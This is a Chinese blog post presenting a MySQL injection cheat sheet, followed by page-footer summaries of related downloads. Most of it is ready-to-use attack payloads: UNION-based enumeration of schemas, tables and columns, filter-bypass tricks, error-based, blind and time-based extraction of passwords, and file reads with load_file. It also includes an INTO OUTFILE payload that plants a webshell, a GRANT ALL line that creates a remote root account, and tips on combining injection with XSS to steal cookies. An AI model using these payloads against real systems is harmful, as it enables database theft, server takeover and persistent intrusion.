`
wuxianjun
  • 浏览: 5715 次
  • 性别: Icon_minigender_1
  • 来自: 中国
社区版块
存档分类
最新评论

mysql注入总结

 
阅读更多

目录:

0x00 mysql一般注入(select)

0x01 mysql一般注入(insert、update)

0x02 mysql报错注入

0x03 mysql一般盲注

0x04 mysql时间盲注

0x05 mysql其他注入技巧

0x06 mysql数据库版本特性

0x07 声明



正文:



0x00 mysql一般注入(select)



1.注释符
#
/*
--



2.过滤空格注入
使用/**/或()或+代替空格

%0c = form feed, new page
%09 = horizontal tab
%0d = carriage return
%0a = line feed, new line



3.多条数据显示
concat()
group_concat()
concat_ws()



4.相关函数
system_user() 系统用户名
user() 用户名
current_user 当前用户名
session_user()连接数据库的用户名
database() 数据库名
version() MYSQL数据库版本
load_file() MYSQL读取本地文件的函数
@@datadir 读取数据库路径
@@basedir MYSQL 安装路径
@@version_compile_os 操作系统 Windows Server 2003

GRANT ALL PRIVILEGES ON *.* TO 'root'@'%' IDENTIFIED BY '123456' WITH GRANT OPTION;

5.mysql一般注入语句

猜字段数

order by n/*
查看mysql基本信息
and 1=2 union select 1,2,3,concat_ws(char(32,58,32),0x7c,user(),database(),version()),5,6,7/*
查询数据库
and 1=2 union select 1,schema_name,3,4 from information_schema.schemata limit 1,1/*
and 1=2 union select 1,group_concat(schema_name),3,4 from information_schema.schemata/*
查询表名
and 1=2 union select 1,2,3,4,table_name,5 from information_schema.tables where table_schema=数据库的16进制编码 limit 1,1/*
and 1=2 union select 1,2,3,4,group_concat(table_name),5 from information_schema.tables where table_schema=数据库的16进制编码/*
查询字段
and 1=2 union select 1,2,3,4,column_name,5,6,7 from information_schema.columns where table_name=表名的十六进制编码 and table_schema=数据库的16进制编码 limit 1,1/*
and 1=2 union select 1,2,3,4,group_concat(column_name),5,6,7 from information_schema.columns where table_name=表名的十六进制编码 and table_schema=数据库的16进制编码/*
查询数据
and 1=2 union select 1,2,3,字段1,5,字段2,7,8 from 数据库.表/*

判断是否具有读写权限
and (select count(*) from mysql.user)>0/*
and (select count(file_priv) from mysql.user)>0/*



6.mysql读取写入文件

必备条件:

读:file权限必备

写:1.绝对路径 2.union使用 3. 可以使用'' 

-------------------------读----------------------                    

mysql3.x读取方法
create table a(cmd text);
load data infile 'c:\\xxx\\xxx\\xxx.txt' into table a;
select * from a;

mysql4.x读取方法
除上述方法还可以使用load_file()
create table a(cmd text);
insert into a(cmd) values(load_file('c:\\ddd\\ddd\\ddd.txt'));
select * from a;

mysql5.x读取方法
上述两种都可以

读取文件技巧:
load_file(char(32,26,56,66))
load_file(0x633A5C626F6F742E696E69)

------------写--------------------------

into outfile写文件

union select 1,2,3,char(这里写入你转换成10进制或16进制的一句话木马代码),5,6,7,8,9,10,7 into outfile 'd:\web\90team.php'/*
union select 1,2,3,load_file('d:\web\logo123.jpg'),5,6,7,8,9,10,7 into outfile 'd:\web\90team.php'/*



0x01 mysql一般注入(insert、update)



mysql一般请求mysql_query不支持多语句执行,mysqli可以。



insert注入多使用报错注入!

1.如果可以直接插入管理员可以直接使用!

insert into user(username,password) values('xxxx',' xxxx'),('dddd','dddd')/* ');

2.如果可以插入一些数据,这些数据会在网页中显示,我们可以结合xxs和csrf来获取cookies或getshell



update注入同上



0x02 mysql报错注入



1. and(select 1 from(select count(*),concat((select (select (语句)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1

语句处填入一般一句,如:SELECT distinct concat(0x7e,0x27,schema_name,0x27,0x7e) FROM information_schema.schemata LIMIT 0,1



2. and+1=(select+*+from+(select+NAME_CONST((语句),1),NAME_CONST((语句),1))+as+x)--



3.update web_ids set host='www.shitsec.com' where id =1 aNd (SELECT 1 FROM (select count(*),concat(floor(rand(0)*2),(substring((Select (语句)),1,62)))a from information_schema.tables group by a)b);



4.insert into web_ids(host) values((select (1) from mysql.user where 1=1 aNd (SELECT 1 FROM (select count(*),concat(floor(rand(0)*2),(substring((Select (语句)),1,62)))a from information_schema.tables group by a)b)));




0x03 mysql一般盲注



使用ascii

AND ascii(substring((SELECT password FROM users where id=1),1,1))=49

使用正则表达式

and 1=(SELECT 1 FROM information_schema.tables  WHERE TABLE_SCHEMA="blind_sqli" AND table_name REGEXP '^[a-n]' LIMIT 0,1)



0x04 mysql时间盲注



1170 union select if(substring(current,1,1)=char(11),benchmark(5000000,encode('msg','by 5 seconds')),null) from (select database() as current) as tbl



UNION SELECT IF(SUBSTRING(Password,1,1)='a',BENCHMARK(100000,SHA1(1)),0) User,Password FROM mysql.user WHERE User = ‘root’





0x05 mysql其他注入技巧



以后遇见了更新



0x06 mysql数据库版本特性



1. mysql5.0以后  information.schema库出现

2. mysql5.1以后 udf 导入xx\lib\plugin\ 目录下

3.mysql5.x以后 system执行命令
分享到:
评论

相关推荐

    Mysql注入总结1

    以下是对标题“Mysql注入总结1”和描述中涉及的知识点的详细解释: 1. **UNION SELECT 注入**: 当一个Web应用程序将用户输入的数据直接拼接到SQL查询中时,攻击者可以利用`UNION SELECT`来合并两个或多个查询结果...

    mysql注入辅助程序

    总结来说,MySQL注入辅助程序是针对网络安全专业人士的有力武器,它能够帮助他们快速定位并解决MySQL数据库系统的安全问题,提升应用的安全性,防止恶意的SQL注入攻击。正确使用此类工具,可以显著降低被黑客利用的...

    MYSQL注入获取权限

    MySQL注入是一种常见的网络安全漏洞,它发生在应用程序未能正确过滤或验证用户输入的情况下,允许攻击者向数据库发送恶意SQL命令。在“MYSQL注入获取权限”这个主题中,我们将深入探讨这一漏洞的原理、危害以及如何...

    河马MySQL注入工具v1.1

    "河马MySQL注入工具v1.1" 是一个专门针对MySQL数据库的注入工具,主要用于安全测试和漏洞探测。版本号为v1.1,表明这是该工具的升级版,可能包含了对原有功能的改进和新功能的添加。 【描述解析】 描述中提到"通过...

    PHP+MYSQL注入

    ### PHP+MYSQL注入详解 #### 一、PHP与MYSQL注入概念 PHP与MYSQL注入是一种常见的Web应用程序...总结,PHP+MYSQL注入是一种严重威胁Web应用程序安全的技术。了解其工作原理以及如何进行防御对于保护网络系统至关重要。

    网易技术部MySQL资料总结.pdf

    标题为“网易技术部MySQL资料总结.pdf”,说明文档是网易技术部关于MySQL数据库的技术总结,内容按照开发篇和优化篇两个部分进行分类,覆盖面从基础使用到性能优化等多方面知识。 在描述中提到文档具有很高的参考...

    基于MySQL的SQL注入攻击

    ### 基于MySQL的SQL注入攻击:深入解析与防范策略 #### 一、SQL注入概念及危害 SQL注入(SQL Injection,简称SQLi)是一种常见的网络安全攻击方式,攻击者通过将恶意SQL代码插入到应用程序的输入字段中,利用应用...

    第二节 Mysql注入有关知识点-01

    下面是Mysql注入有关知识点的总结: 1. Mysql 5.x数据结构 在Mysql 5.0以上的版本中,为了方便管理,默认定义了information_schema数据库,用来存储数据库元信息。其中具有表schemata(数据库名)、tables(表名)...

    精心整理-渗透测试工程师(CISP-PTE)考试资料大全(包括课件PPT,考试大纲,题库及经验分享).zip

    精心整理,渗透测试工程师(CISP-PTE)考试资料大全,包括课件PPT,考试大纲,题库及经验分享,共75份。...mysql注入总结.txt nealwe_cisp_payload背诵.pdf 经验分享1.docx 四、题库及考试经验(9份经验分享)

    SQL注入漏洞全接触.ppt

    * 根据不同的数据库管理系统, SQL注入漏洞可以分为Access注入、SQL Server注入、MySQL注入等。 * 不同的数据库管理系统有不同的函数、注入方法,所以在注入之前,我们还要判断一下数据库的类型。 四、 SQL注入漏洞...

    MySQL注入绕开过滤的技巧总结

    MySQL注入是一种常见的安全威胁,它发生在应用程序的输入数据未经适当验证就被用来构造SQL查询时。攻击者可以通过注入恶意SQL代码来获取、修改、甚至删除数据库中的敏感信息。本篇文章主要探讨了如何在过滤机制存在...

    MySQLDBA运维笔记(总结得特别详细)

    从给定文件的标题、描述和部分内容来看,这些内容主要涉及MySQL数据库的运维知识和操作技能。以下是根据提供的信息整理出的详细知识点。 ### MySQL数据库的种类和介绍 #### 关系型数据库 关系型数据库是基于关系...

    注入总结之万能密码

    ### 注入总结之万能密码 #### 一、概述 SQL注入是一种常见的网络安全攻击手段,攻击者通过在应用程序中插入恶意SQL代码来控制后端数据库服务器。本文将针对三种不同的技术栈(PHP+MySQL、ASP+Access、ASP+MS SQL)...

    mysql-injection.pdf

    从给定文件信息中,我们可以提取出关于MySQL注入以及sqli-labs使用手册的知识点。 首先,文件标题“mysql-injection.pdf”和描述“MySQL注入天书---------Sqli-labs 使用手册”明确指出了文档的主题,即如何进行...

    MYSQL注入中load_file()函数的进一步应用

    在探讨“MYSQL注入中load_file()函数的进一步应用”这一主题时,我们深入解析load_file()函数在SQL注入攻击中的核心角色及其高级应用。load_file()函数是MySQL中一个允许从服务器磁盘读取文件的强大工具,但在安全性...

    利用JDBC工具类的方式实现mysql数据库的连接并且完成登录相关功能(防sql注入方式)

    总结起来,利用JDBC工具类与MySQL数据库进行交互,使用PreparedStatement进行安全的SQL操作,是Java后端开发中常见的实践。了解并掌握这些技术对于开发安全、高效的应用至关重要。在实际项目中,我们还需要考虑其他...

    mysql教程详细总结

    MySQL教程详细总结 引言 MySQL是一款开源、免费的关系型数据库管理系统,被广泛应用于Web应用程序中,因其高效、稳定和易用性而受到青睐。本教程将深入探讨MySQL的各个方面,帮助初学者和进阶者全面理解其核心概念...

    sql注入讲解ppt.pptx

    SQL 注入基础知识点总结 SQL 注入是指 web 应用程序对用户输入数据的合法性没有判断或过滤不严,攻击者可以在 web 应用程序中事先定义好的查询语句的结尾上添加额外的 SQL 语句,在管理员不知情的情况下实现非法...

    mysql ocp题库总结

    选项B和D的GTID_NEXT设置方式不正确,因为它们试图设置一个特定的GTID,而不是注入一个空事务来解决冲突。 正确的解决方案是选项E:首先设置GTID_NEXT为特定的事务ID(38f32e23480a7-32a1-c323f78067fd37821: 9)...

    Mysql报错注入详解.docx

    MySQL 报错注入是一种安全漏洞利用技术,当应用程序在处理用户输入时未能充分过滤或转义SQL语句,导致数据库因错误语法而返回错误信息,攻击者可以通过分析这些错误信息来获取敏感信息或执行恶意操作。以下是对MySQL...

Global site tag (gtag.js) - Google Analytics